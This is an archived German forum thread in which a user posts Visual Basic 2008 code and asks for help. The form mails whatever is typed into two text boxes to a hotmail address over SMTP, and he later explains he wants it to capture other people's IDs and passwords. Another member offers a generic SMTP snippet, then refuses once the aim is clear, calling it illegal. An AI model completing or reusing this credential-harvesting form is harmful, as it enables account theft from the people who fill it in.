Register for your free account! | Forgot your password?

Go Back   elitepvpers > General > Main
You last visited: Today at 14:38

  • Please register to post and access all features, it's quick, easy and FREE!

VB 2008 -> Keyloggercode-Fehler?

Closed Thread
 
Old   #1
 
elite*gold: 5
Join Date: Apr 2011
Posts: 1,959
Received Thanks: 1,479
Red face VB 2008 -> Keyloggercode-Fehler?

Also mein Code (wahrscheinlich fehlerhaft):

Code:
Imports System.Net.Mail
Imports System.Net
Public Class Form1

    Private Sub TextBox1_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TextBox1.TextChanged

    End Sub

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Timer1.Start()
        Dim text As String
        text = TextBox1.Text & TextBox2.Text + vbLf
        Dim myClient As New Net.Mail.SmtpClient("smtp.web.de")
        myClient.Credentials = New NetworkCredential("*****", "***")
        myClient.Send("***", "***, ***", "Betreff", text)
    End Sub

    Private Sub TextBox3_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs)

    End Sub

    Private Sub TextBox2_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TextBox2.TextChanged

    End Sub
End Class
Besitze 2 Textboxen, 1 Timer und ein Button! Wo ist der Fehler ?



Danke schonmal im Vorraus!

LG
KS

€: Gelbmakierter Fehler: myClient.Send("***@hotmail.de", "***@hotmail.de, ****@hotmail.de", "Betreff", text)
Papa Kobe is offline  
Old 10/23/2011, 12:14   #2
 
elite*gold: 5
Join Date: Sep 2010
Posts: 9,931
Received Thanks: 4,386
Hi,

das kommt in die Coding Section. Einen Fehler erkenne ich da nicht, aber ich würde es anders machen:

Code:
Dim email As String
          Dim betreff As String
          Dim empfänger As String

        email = TextBox4.Text
        betreff = TextBox3.Text
        empfänger = TextBox2.Text

Dim myclient As New Net.Mail.SmtpClient("smtp.web.de")

        myclient.EnableSsl = True

        myclient.DeliveryMethod = SmtpDeliveryMethod.Network

yclient.UseDefaultCredentials = False
        myclient.Credentials = New NetworkCredential("Benutzername" , "Passwort")

myclient.Send(TextBox1.Text, TextBox2.Text, TextBox3.Text, TextBox4.Text)
Du machst also 4 Textboxen:

1. Absender (Deine Emailadresse)
2. Empfänger (Die Emailadresse des anderen)
3. Den Betreff
4. Der Text, der gesendet werden soll.

Das ganze steht natürlich unter dem Button, mit dem du das absendest. Man könnte auch noch einbauen, dass man seinen Benutzernamen und sein Passwort manuell eingeben kann, dann muss man sich nicht auf eine Emailadresse festlegen.

Grüße
Diablo_ is offline  
Thanks
1 User
Old 10/23/2011, 12:24   #3
 
elite*gold: 5
Join Date: Apr 2011
Posts: 1,959
Received Thanks: 1,479
Quote:
Originally Posted by Diablo_ View Post
Hi,

das kommt in die Coding Section. Einen Fehler erkenne ich da nicht, aber ich würde es anders machen:

Code:
Dim email As String
          Dim betreff As String
          Dim empfänger As String

        email = TextBox4.Text
        betreff = TextBox3.Text
        empfänger = TextBox2.Text

Dim myclient As New Net.Mail.SmtpClient("smtp.web.de")

        myclient.EnableSsl = True

        myclient.DeliveryMethod = SmtpDeliveryMethod.Network

yclient.UseDefaultCredentials = False
        myclient.Credentials = New NetworkCredential("Benutzername" , "Passwort")

myclient.Send(TextBox1.Text, TextBox2.Text, TextBox3.Text, TextBox4.Text)
Du machst also 4 Textboxen:

1. Absender (Deine Emailadresse)
2. Empfänger (Die Emailadresse des anderen)
3. Den Betreff
4. Der Text, der gesendet werden soll.

Das ganze steht natürlich unter dem Button, mit dem du das absendest. Man könnte auch noch einbauen, dass man seinen Benutzernamen und sein Passwort manuell eingeben kann, dann muss man sich nicht auf eine Emailadresse festlegen.

Grüße
Hey,
erstmal danke und ich wollte aber einen Keylogger haben^^ d.h. der soll in eine Textbox seine ID und in die andere sein PW eingeben und vlt. noch ein 3. wo der Servername reinsoll & -> Es soll an die ****@hotmail.de gesendet werden -> mit der Aktivierung des Button1. :O

Wär es möglich, dass du es mir so umformen könntest?^^ Wäre echt lieb

LG
KS

€: Nimm in Skype an
Papa Kobe is offline  
Old 10/23/2011, 12:31   #4
 
elite*gold: 5
Join Date: Sep 2010
Posts: 9,931
Received Thanks: 4,386
Quote:
Originally Posted by King KampfSessel View Post
Hey,
erstmal danke und ich wollte aber einen Keylogger haben^^ d.h. der soll in eine Textbox seine ID und in die andere sein PW eingeben und vlt. noch ein 3. wo der Servername reinsoll & -> Es soll an die ****@hotmail.de gesendet werden -> mit der Aktivierung des Button1. :O

Wär es möglich, dass du es mir so umformen könntest?^^ Wäre echt lieb

LG
KS

€: Nimm in Skype an
Hi,

tut mir leid, ich hatte mich in der Überschrift verlesen. Ich dachte dir wurde ein Fehler bei VB ausgespuckt und habe das "Keylogger" übersehen.

Das was du vor hast ist aber nicht legal und das unterstützen wir hier nicht.
Diablo_ is offline  
Old 10/23/2011, 13:49   #5
 
elite*gold: 60
The Black Market: 107/0/0
Join Date: Oct 2009
Posts: 3,398
Received Thanks: 501
Quote:
Originally Posted by Diablo_ View Post
Hi,

tut mir leid, ich hatte mich in der Überschrift verlesen. Ich dachte dir wurde ein Fehler bei VB ausgespuckt und habe das "Keylogger" übersehen.

Das was du vor hast ist aber nicht legal und das unterstützen wir hier nicht.
Nö es gibt im wahrsten sinne des Wortes "legale" Keyloogers.

Nämlich in der Coding-section...einfach suchen in den kleinen Realeses.

€:Was er meint is natürlich Verboten !
Playtime™ is offline  
Old 10/23/2011, 14:11   #6
 
elite*gold: 5
Join Date: Sep 2010
Posts: 9,931
Received Thanks: 4,386
Quote:
Originally Posted by ZØmBÌ View Post
Nö es gibt im wahrsten sinne des Wortes "legale" Keyloogers.

Nämlich in der Coding-section...einfach suchen in den kleinen Realeses.

€:Was er meint is natürlich Verboten !
Ich habe auch nicht geschrieben, dass Keylogger illegal sind. Das was er vor hat wird illegal sein.

Wer meint, er bräuchte einen Keylogger um seine Passwörter immer parrat zu haben, der kann sich den Kram auch einfach aufschreiben.

Und wer meint, er bräuchte einen Keylogger um andere Passwörter zu besitzen, die ihm nicht gehören, gehören bestraft.
Diablo_ is offline  
Thanks
1 User
Closed Thread


Similar Threads
v15 Server einrichten - Fehler bei Management Studio 2008 help !
08/28/2011 - Flyff PServer - Discussions / Questions - 0 Replies
Hey leute . Wollte mir gerade mal alles startklar machen nen v15 Server von Sedrika damit ich morgen rumfuchteln kan :P Bei dem Management Studio ist bei mir dieser Fehler : Die SQL Server 2005 Express-Tools sind installiert. Entfernen Sie die SQL Server 2005 Express-Tools, um den Vorgang fortzusetzen. Ich weißt jetzt nicht wie ich die Dateien losbekommen soll . Weiß einer Rat ? Bin nähmlich nicht gerade der helle in solchen Sachn .... :( Bin darauf gestoßen :...
Visual Basic 2008 Fehler
02/06/2010 - Main - 1 Replies
Hallo, Habe ein Programm mit Visual Basic gecode. Dann kam dieser fehler: Die Anweißung ist in einem Namespace ungültig was meinen die damit?
Visual Basic 2008 Fehler
02/06/2010 - .NET Languages - 3 Replies
Hallo, Habe grad mit Visual Basic 2008 ein Programm gemacht. Aber es taucht ein Fehler auf. Fehler: Die Anweißung ist in einem Namespace ungültig
VB 2008 - Dubugen Fehler
02/01/2010 - Off Topic - 5 Replies
Hallo, Wollte nen Spamer machen. Code: Public Class Form2 Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick



All times are GMT +1. The time now is 14:38.


Powered by vBulletin®
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Abuse
Copyright ©2018 elitepvpers All Rights Reserved.